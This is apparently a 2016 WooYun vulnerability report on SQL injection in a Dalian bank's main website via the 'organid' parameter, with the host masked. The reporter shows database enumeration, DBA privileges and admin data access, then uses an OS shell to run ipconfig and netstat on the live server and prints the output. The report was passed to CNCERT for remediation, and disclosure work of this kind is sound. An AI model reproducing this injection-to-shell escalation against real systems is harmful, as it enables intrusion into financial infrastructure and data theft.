当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171290

漏洞标题:大连某银行www主站SQL注入泄露敏感数据信息(可OS-Shell)

相关厂商:大连某银行

漏洞作者: 路人甲

提交时间:2016-01-20 13:38

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

RT

详细说明:

大连农商银行主站(http://**.**.**.**/)存在SQL注入。
注入地址:http://**.**.**.**/NewsWebUI/NewSearchMapFrame.aspx?organid=1&searchText=1(organid参数)。
几个月前测试过该地址,当时凭借经验指定了测试的SQL注入参数为searchText,未对organid参数进行测试,今天一位小伙伴看了之前提交的漏洞,说除了searchText参数存在注入外,organid参数也存在注入。
通过这个事情我明白了,人有时真不能懒..但是为什么到现在之前的searchText参数还未修复呢。

漏洞证明:

大连农商行主站:

大连农商行主站.png


SQL注入地址:http://**.**.**.**/NewsWebUI/NewSearchMapFrame.aspx?organid=1&searchText=1(注入参数:organid,之前提交的searchText到目前还没修复啊,都已经公开了啊,银行系统漏洞不是该响应很快的吗)
测试结果:

sql注入啊.png


8库

8个数据库.png


DBA权限

dba权限.png


current-db:

当前数据库.png


web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: CmsDB
[14 tables]
+--------------------+
| ATTACHINFO         |
| DictInfo           |
| FriendshipInfo     |
| OrganInfo          |
| PROGRAMARTICLEINFO |
| PROGRAMINFO        |
| PRO_CONTENT_INFO   |
| PRO_DIR_MASTER     |
| PRO_LINK_SET       |
| PRO_NEWS_SET       |
| RolePowerInfo      |
| UserAndRole        |
| UserInfo           |
| UserRole           |
+--------------------+


看下管理员信息,其他的就不一一看了。

管理员.png


由于是DBA权限,测试了下还可以os-shell

os-shell.png


随便看下
ipconfig

web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
command standard output:
---
Windows IP 配置
 
 
以太网适配器 本地连接 3:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
 
以太网适配器 本地连接 2:
 
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::619c:d6a6:8dc4:c3d0
   IPv4 地址 . . . . . . . . . . . . : **.**.**.**
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : **.**.**.**
 
以太网适配器 本地连接:
 
   连接特定的 DNS 后缀 . . . . . . . : 
   自动配置 IPv4 地址  . . . . . . . : **.**.**.**
   子网掩码  . . . . . . . . . . . . : **.**.**.**
   默认网关. . . . . . . . . . . . . : 
 
隧道适配器 本地连接*:
 
   媒体状态  . . . . . . . . . . . . : 媒体已断开


netstat -an

活动连接
 
  协议  本地地址          外部地址        状态
  TCP    **.**.**.**:80             **.**.**.**:0              LISTENING
  TCP    **.**.**.**:135            **.**.**.**:0              LISTENING
  TCP    **.**.**.**:445            **.**.**.**:0              LISTENING
  TCP    **.**.**.**:902            **.**.**.**:0              LISTENING
  TCP    **.**.**.**:912            **.**.**.**:0              LISTENING
  TCP    **.**.**.**:1433           **.**.**.**:0              LISTENING
  TCP    **.**.**.**:2383           **.**.**.**:0              LISTENING
  TCP    **.**.**.**:3389           **.**.**.**:0              LISTENING
  TCP    **.**.**.**:8088           **.**.**.**:0              LISTENING
  TCP    **.**.**.**:49152          **.**.**.**:0              LISTENING
  TCP    **.**.**.**:49153          **.**.**.**:0              LISTENING
  TCP    **.**.**.**:49154          **.**.**.**:0              LISTENING
  TCP    **.**.**.**:49155          **.**.**.**:0              LISTENING
  TCP    **.**.**.**:49156          **.**.**.**:0              LISTENING
  TCP    **.**.**.**:49157          **.**.**.**:0              LISTENING
  TCP    **.**.**.**:1434         **.**.**.**:0              LISTENING
  TCP    **.**.**.**:139     **.**.**.**:0              LISTENING
  TCP    **.**.**.**:80      **.**.**.**:4836    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4841    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4842    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4843    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4848    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4849    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4850    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4853    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4856    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4857    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4860    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4861    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4862    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4865    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4870    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4871    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4874    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4875    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4876    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4883    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4884    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4886    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4888    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4896    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4898    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4899    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4900    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4903    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4910    TIME_WAIT
  TCP    **.**.**.**:80      **.**.**.**:4976    ESTABLISHED
  TCP    **.**.**.**:80      **.**.**.**:2551      ESTABLISHED
  TCP    **.**.**.**:80      **.**.**.**:2570      ESTABLISHED
  TCP    **.**.**.**:80      **.**.**.**:49257    ESTABLISHED
  TCP    **.**.**.**:80      **.**.**.**:64731     ESTABLISHED
  TCP    **.**.**.**:80      **.**.**.**:64748     ESTABLISHED
  TCP    **.**.**.**:80      **.**.**.**:49970  ESTABLISHED
  TCP    **.**.**.**:139     **.**.**.**:0              LISTENING
  TCP    [::]:80                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:1433              [::]:0                 LISTENING
  TCP    [::]:2383              [::]:0                 LISTENING
  TCP    [::]:3389              [::]:0                 LISTENING
  TCP    [::]:8088              [::]:0                 LISTENING
  TCP    [::]:49152             [::]:0                 LISTENING
  TCP    [::]:49153             [::]:0                 LISTENING
  TCP    [::]:49154             [::]:0                 LISTENING
  TCP    [::]:49155             [::]:0                 LISTENING
  TCP    [::]:49156             [::]:0                 LISTENING
  TCP    [::]:49157             [::]:0                 LISTENING
  TCP    [::1]:1434             [::]:0                 LISTENING
  UDP    **.**.**.**:68             *:*                    
  UDP    **.**.**.**:123            *:*                    
  UDP    **.**.**.**:500            *:*                    
  UDP    **.**.**.**:4500           *:*                    
  UDP    **.**.**.**:5355           *:*                    
  UDP    **.**.**.**:137     *:*                    
  UDP    **.**.**.**:138     *:*                    
  UDP    **.**.**.**:137     *:*                    
  UDP    **.**.**.**:138     *:*                    
  UDP    [::]:123               *:*                    
---


E盘目录

e盘.png


OK,就不深入了。

修复方案:

抓紧修复啊

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-22 11:23

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置同时已经转由CNCERT下发辽宁分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价